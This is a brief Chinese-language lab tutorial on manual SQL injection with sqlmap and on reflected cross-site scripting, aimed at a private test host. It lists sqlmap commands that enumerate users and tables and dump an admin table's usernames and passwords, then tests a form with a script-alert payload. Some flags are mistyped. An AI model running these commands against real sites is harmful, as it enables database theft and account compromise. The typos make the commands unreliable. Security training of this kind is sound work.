sqlmap手工注入以及XSS

注意：以下使用http://192.168.1.3作为所要注入的主机

1.检测出的信息准确，-u扫描注入点扫描目标主机

   Sqlmap –u http://192.168.1.3:8008/onews.asp?id=45

 

2. 获取到用户名

    sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 – users

3.探索数据库和表的信息

    sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 –dump –tables

4.获得用户名和密码

    sqlmap –u http://192.168.1.3:8008/onesws.asp?id=45 –dump –T admin –C admin,password进行暴库

XSS

XSS又叫CSS,跨站脚本攻击，它指的是恶意攻击者往web页面里插入恶意代码，当用户浏览该页时，嵌入其中web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的，在xss的攻击方式中需要欺骗用户自己去点击链接才能触发XSS称为反射型XSS

一、打开测试站点

1. 在ie地址中输入测试路径http://192.168.1.3:8006/ input.htm
2. 在表单中输入hello，点击提交，输出结果正常，没有其他影响

二、在站点中输入xss代码

1. 在表单中输入XSS代码<script>alert(‘hello’)</script>
2. 可以看到，当我们提交XSS代码后，浏览器会弹出一个对话框，显示我们输入的内容